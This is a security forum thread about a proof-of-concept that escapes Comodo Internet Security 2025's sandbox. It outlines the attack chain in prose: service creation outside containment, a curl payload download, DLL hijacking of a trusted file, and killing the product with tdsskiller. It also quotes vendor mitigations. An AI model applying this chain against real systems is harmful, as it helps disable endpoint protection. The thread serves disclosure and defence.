Serious Discussion Comodo Internet Security 2025 was obliterated by an exploit!

Status
Not open for further replies.

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
I finished the third version of the POC and now it does not require any additional files ;)

detection shellcode injection is enabled, untrusted restricted mode, and embedded code detection on

If I correctly understood you bypassed the sandbox protection related to dropping files outside the sandbox. However, it does not follow from your post that those files can be executed outside the sandbox by the POC, or that the POC can modify files outside the sandbox. Can the POC do such actions? I have in mind the first phase of attack, before downloading tdsskiller.

Edit.
The POC should be blocked in the @cruelsister's settings because the contained executable could not call home.
 
Last edited:

Loyisa

Level 1
Aug 8, 2024
20
If I correctly understood you bypassed the sandbox protection related to dropping files outside the sandbox. However, it does not follow from your post that those files can be executed outside the sandbox by the POC, or that the POC can modify files outside the sandbox. Can the POC do such actions? I have in mind the first phase of attack, before downloading tdsskiller.

Edit.
The POC should be blocked in the @cruelsister's settings because the contained executable could not call home.
Yes, the POC use a special way to create service which Comodo can't handle properly, then comodo will think that svchost.exe is executing those commands/files, not the poc itself
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
Treat the symptom, not the disease.
I can still release the payload in other directories:(

Only that particular sample is blocked in the @cruelsister settings. It is possible to embed the payloads in the POC and drop/execute them without downloading anything. (y)

Yes, the POC use a special way to create service which Comodo can't handle properly, then comodo will think that svchost.exe is executing those commands/files, not the poc itself

It would be interesting to check if the payload dropped to the sandbox, copied by your exploit outside the sandbox and executed via Svchost, can still be contained in the sandbox. :unsure:
 

Loyisa

Level 1
Aug 8, 2024
20
Only that particular sample is blocked in the @cruelsister settings. It is possible to embed the payloads in the POC and drop/execute them without downloading anything. (y)



It would be interesting to check if the payload dropped to the sandbox, copied by your exploit outside the sandbox and executed via Svchost, can still be contained in the sandbox. :unsure:
The execution flow is as follows:
Run POC -> POC can create services outside containment through magic -> Use service(to run curl.exe) to download the payloads ->
-> Use service to run a file trusted by Comodo and do dll hijacking(the bad dll released escaped.txt) -> Run tdsskiller -> Comodo dead
comodoo.gif
 
Last edited:
  • Like
Reactions: Andy Ful

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
The execution flow is as follows:
Run POC -> POC can create services outside containment through magic -> Use service(curl.exe) to download the payloads ->
-> Use service to run a file trusted by Comodo and do dll hijacking(the bad dll released escaped.txt) -> Run tdsskiller -> Comodo dead

So, the trusted executable executed by the service outside the sandbox can load the malicious DLL, and that DLL will not be sandboxed?
 

Loyisa

Level 1
Aug 8, 2024
20
So, the trusted executable executed by the service outside the sandbox can load the malicious DLL, and that DLL will not be sandboxed?
Yes, Comodo doesn't seem to be very good at DLL hijacking and DLL is basically not sandboxable, basically trusted files + bad dll = comodo blinded
If you use Safe mode in HIPS/firewall to face DLL hijacking, it basically means that your computer is not safe.
(During this process, Comodo did not monitor the creation of services, svchost.exe and curl.exe were both trusted files, so there were no firewall alerts.)
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
Yes, Comodo doesn't seem to be very good at DLL hijacking and dll is basically not sandboxable, basically trusted files + bad dll = comodo blinded

So, the attack can be also done fully outside the sandbox, except if in DLL hijacking the execution of a trusted file has to be done via the custom service.
 

Loyisa

Level 1
Aug 8, 2024
20

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
I think, that there is an option in Comodo that prevents the automatic authorization of untrusted executables executed by trusted ones. This option could probably block DLL hijacking. But it can significantly increase false positives.
 
Last edited:

Loyisa

Level 1
Aug 8, 2024
20
I think that there is an option in Comodo that prevents automatic authorization of untrusted executables executed by trusted ones. This option could probably block DLL hijacking.
But it can significantly increase false positives.
Yes, Safe mode in HIPS prevents trusted executables from executing untrusted executables, but it does not prevent DLL hijacking
 

rashmi

Level 12
Jan 15, 2024
578
For those interested, there is additional information about this topic on Comodo forums.
A moderator's response.
"I only took a quick look at the source code and I can tell what the issue is. By default cis does not protect access to the service control manager defined as *\RPC Control\ntsvcs so you would need to add that path to the protected COM interfaces section. The source code also contains code that attempts to access the SCM via a named pipe so you can also add *\Device\NamedPipe\ntsvcs to the protected files section to cover the named pipe access.

With that said, there is a compatability issue with windows UAC that prevents containment restriction levels being set to the desired restriction level for applications that require administrator rights. This means if you set the containment rule to use a restriction level higher than partially limited e.g. limited, restricted, or untrusted and you run an application that requests admin rights/elevation, then cis will lower the restriction level to partially limited. So you don’t get the protection provided by the higher restriction levels.

Therefore you need to completely disable UAC by setting the enableLUA registry value to 0. This is important to note as using SCM requires admin rights and setting UAC to never notify, doesn’t actually disable UAC itself as it just won’t pop up an UAC alert and will auto grant elevation to admin.

Edit: oh and there is yet another bug that affects cis on windows 11 with regards to using restriction levels. Whenever an application is executed by windows explorer, which happens when you use your mouse to run apps, the restrictions that are supposed to be applied don’t get set so you get tricked into a false sense of security."
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
For those interested, there is additional information about this topic on Comodo forums.
A moderator's response.
...
With that said, there is a compatability issue with windows UAC that prevents containment restriction levels being set to the desired restriction level for applications that require administrator rights. This means if you set the containment rule to use a restriction level higher than partially limited e.g. limited, restricted, or untrusted and you run an application that requests admin rights/elevation, then cis will lower the restriction level to partially limited. So you don’t get the protection provided by the higher restriction levels. ..."

So, using a Standard User Account can be valuable for real containment. :)
However, this will not solve the DLL hijacking issue and malware that can encrypt/steal data with standard privileges.
 
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top